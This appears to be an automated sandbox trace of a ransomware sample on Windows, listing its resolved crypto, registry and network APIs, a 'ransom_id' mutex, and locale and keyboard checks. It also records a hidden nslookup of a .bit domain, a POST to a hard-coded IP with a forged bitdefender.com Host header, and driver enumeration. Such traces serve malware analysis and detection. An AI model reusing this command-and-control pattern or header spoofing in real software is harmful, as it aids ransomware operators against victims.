| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75c07990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x75c15100 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x75c08c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x75c16800 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x770d0e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x75c0cd50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75c03690 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x75c16660 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x75c0f640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x75c02ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x75c00540 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x75c07830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x75c0d290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x75c17b50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x770bf210 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x770bf290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75c16960 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75c07970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75c168e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75c169a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x75c0ac70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x75c146a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x75c169f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x75c15120 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x75c16b60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75c14bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x75c07590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75c07600 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x75c09b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75c16630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x75c2d170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x75c099b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x770e7a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75c16890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75c09b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75c16ca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x75c09bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x75c09b20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x75c08d60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x75c16a70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x75c09970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x75c0ea30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75c099f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75c07810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75c078b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75c0f5a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x75c16b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75c07710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75c01ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770b2bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75c08c80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x75c0b000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75c17b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75c09bf0 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x76110000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x76148a60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x7613f890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x7612d9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x7612abd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x7612a740 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x7618fec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x76144f60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x76148a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x73d314e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x76129580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x76148e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x76129860 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x76125d90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x761262e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x73d307e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x761383a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x761404a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x76148cb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x73d31040 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76710000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x767b8830 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x76330440 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x7632f7f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x7632fa20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7632f620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x7632fb30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x76330590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x76346bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x76330650 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7632faf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x76346b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x76333910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x76330400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x76331030 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x7632f330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7632f350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x7632f660 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x74240000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x743dd9f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x743ef9c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x743de690 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x76860000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x7687d6d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x7687e0f0 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x6fb50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x6fc1d200 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x6fbcbec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x6fc16ef0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x6fc045f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x6fbd0fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x6fc18490 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x6fbd7320 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x75640000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = EnumDeviceDrivers, address_out = 0x75641340 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetDeviceDriverBaseNameW, address_out = 0x756413a0 |
|
1 |
Thread 0xb24
55
24
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77080000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7714d9b0 |
|
1 | |
| Mutex | Create | mutex_name = Global\pc_group=WORKGROUP&ransom_id=58de2295a283c81 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77080000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7714d9b0 |
|
1 | |
| System | Get Time | type = Ticks, time = 131812 |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Control Panel\International |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77080000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7714d9b0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = Host: bitdefender.com |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ |
|
1 | |
| Inet | Read Response | size = 10238, size_out = 14 |
|
1 | |
| Inet | Read Response | size = 10238, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Get Filename | process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 256 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, type = size |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 285192, size_out = 285192 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77080000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7714d9b0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| Process | Create | process_name = nslookup politiaromana.bit ns1.virmach.ru, os_pid = 0xb74, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| File | Read | size = 4096, size_out = 101 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 77.244.219.151, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.1, target_resource = seyst, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = Host: bitdefender.com |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = 77.244.219.151/seyst |
|
1 | |
| Inet | Read Response | size = 204798, size_out = 552 |
|
1 | |
| Inet | Read Response | size = 204798, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77080000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7714d9b0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Get Time | type = Ticks, time = 141890 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0xd48
261
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Driver | Enumerate | load_addresses = 1703688 |
|
1 | |
| Driver | Enumerate | load_addresses = 4521984 |
|
1 | |
| Driver | Get Name | load_address = 3104292864 |
|
1 | |
| Driver | Get Name | load_address = 3103821824 |
|
1 | |
| Driver | Get Name | load_address = 3089149952 |
|
1 | |
| Driver | Get Name | load_address = 1785528320 |
|
1 | |
| Driver | Get Name | load_address = 1786118144 |
|
1 | |
| Driver | Get Name | load_address = 1786183680 |
|
1 | |
| Driver | Get Name | load_address = 1778384896 |
|
1 | |
| Driver | Get Name | load_address = 1778581504 |
|
1 | |
| Driver | Get Name | load_address = 1778712576 |
|
1 | |
| Driver | Get Name | load_address = 1778778112 |
|
1 | |
| Driver | Get Name | load_address = 1778843648 |
|
1 | |
| Driver | Get Name | load_address = 1778909184 |
|
1 | |
| Driver | Get Name | load_address = 1779564544 |
|
1 | |
| Driver | Get Name | load_address = 1779957760 |
|
1 | |
| Driver | Get Name | load_address = 1780416512 |
|
1 | |
| Driver | Get Name | load_address = 1780613120 |
|
1 | |
| Driver | Get Name | load_address = 1781334016 |
|
1 | |
| Driver | Get Name | load_address = 1782185984 |
|
1 | |
| Driver | Get Name | load_address = 1782317056 |
|
1 | |
| Driver | Get Name | load_address = 1782513664 |
|
1 | |
| Driver | Get Name | load_address = 1782579200 |
|
1 | |
| Driver | Get Name | load_address = 1783234560 |
|
1 | |
| Driver | Get Name | load_address = 1783824384 |
|
1 | |
| Driver | Get Name | load_address = 1783889920 |
|
1 | |
| Driver | Get Name | load_address = 1784020992 |
|
1 | |
| Driver | Get Name | load_address = 1784086528 |
|
1 | |
| Driver | Get Name | load_address = 1784217600 |
|
1 | |
| Driver | Get Name | load_address = 1784283136 |
|
1 | |
| Driver | Get Name | load_address = 1784676352 |
|
1 | |
| Driver | Get Name | load_address = 1784807424 |
|
1 | |
| Driver | Get Name | load_address = 1784938496 |
|
1 | |
| Driver | Get Name | load_address = 1785069568 |
|
1 | |
| Driver | Get Name | load_address = 1797849088 |
|
1 | |
| Driver | Get Name | load_address = 1798438912 |
|
1 | |
| Driver | Get Name | load_address = 1798569984 |
|
1 | |
| Driver | Get Name | load_address = 1798963200 |
|
1 | |
| Driver | Get Name | load_address = 1799094272 |
|
1 | |
| Driver | Get Name | load_address = 1786773504 |
|
1 | |
| Driver | Get Name | load_address = 1787297792 |
|
1 | |
| Driver | Get Name | load_address = 1787428864 |
|
1 | |
| Driver | Get Name | load_address = 1787559936 |
|
1 | |
| Driver | Get Name | load_address = 1787822080 |
|
1 | |
| Driver | Get Name | load_address = 1790050304 |
|
1 | |
| Driver | Get Name | load_address = 1790115840 |
|
1 | |
| Driver | Get Name | load_address = 1791295488 |
|
1 | |
| Driver | Get Name | load_address = 1791819776 |
|
1 | |
| Driver | Get Name | load_address = 1792016384 |
|
1 | |
| Driver | Get Name | load_address = 1794506752 |
|
1 | |
| Driver | Get Name | load_address = 1794965504 |
|
1 | |
| Driver | Get Name | load_address = 1795162112 |
|
1 | |
| Driver | Get Name | load_address = 1795883008 |
|
1 | |
| Driver | Get Name | load_address = 1796341760 |
|
1 | |
| Driver | Get Name | load_address = 1796669440 |
|
1 | |
| Driver | Get Name | load_address = 1796931584 |
|
1 | |
| Driver | Get Name | load_address = 1797062656 |
|
1 | |
| Driver | Get Name | load_address = 1797586944 |
|
1 | |
| Driver | Get Name | load_address = 1802174464 |
|
1 | |
| Driver | Get Name | load_address = 1802305536 |
|
1 | |
| Driver | Get Name | load_address = 1802371072 |
|
1 | |
| Driver | Get Name | load_address = 1802436608 |
|
1 | |
| Driver | Get Name | load_address = 1802502144 |
|
1 | |
| Driver | Get Name | load_address = 1802633216 |
|
1 | |
| Driver | Get Name | load_address = 1814233088 |
|
1 | |
| Driver | Get Name | load_address = 1816264704 |
|
1 | |
| Driver | Get Name | load_address = 1816395776 |
|
1 | |
| Driver | Get Name | load_address = 1816526848 |
|
1 | |
| Driver | Get Name | load_address = 1816592384 |
|
1 | |
| Driver | Get Name | load_address = 1816788992 |
|
1 | |
| Driver | Get Name | load_address = 1816854528 |
|
1 | |
| Driver | Get Name | load_address = 1817182208 |
|
1 | |
| Driver | Get Name | load_address = 1817837568 |
|
1 | |
| Driver | Get Name | load_address = 1817968640 |
|
1 | |
| Driver | Get Name | load_address = 1805647872 |
|
1 | |
| Driver | Get Name | load_address = 1805778944 |
|
1 | |
| Driver | Get Name | load_address = 1806303232 |
|
1 | |
| Driver | Get Name | load_address = 1806893056 |
|
1 | |
| Driver | Get Name | load_address = 1806958592 |
|
1 | |
| Driver | Get Name | load_address = 1807024128 |
|
1 | |
| Driver | Get Name | load_address = 1807089664 |
|
1 | |
| Driver | Get Name | load_address = 1807155200 |
|
1 | |
| Driver | Get Name | load_address = 1807482880 |
|
1 | |
| Driver | Get Name | load_address = 1807745024 |
|
1 | |
| Driver | Get Name | load_address = 1807876096 |
|
1 | |
| Driver | Get Name | load_address = 1807941632 |
|
1 | |
| Driver | Get Name | load_address = 1808072704 |
|
1 | |
| Driver | Get Name | load_address = 1808203776 |
|
1 | |
| Driver | Get Name | load_address = 1808596992 |
|
1 | |
| Driver | Get Name | load_address = 1808793600 |
|
1 | |
| Driver | Get Name | load_address = 1809252352 |
|
1 | |
| Driver | Get Name | load_address = 1809383424 |
|
1 | |
| Driver | Get Name | load_address = 1810956288 |
|
1 | |
| Driver | Get Name | load_address = 1811021824 |
|
1 | |
| Driver | Get Name | load_address = 1811087360 |
|
1 | |
| Driver | Get Name | load_address = 1811152896 |
|
1 | |
| Driver | Get Name | load_address = 1811677184 |
|
1 | |
| Driver | Get Name | load_address = 1811742720 |
|
1 | |
| Driver | Get Name | load_address = 1812201472 |
|
1 | |
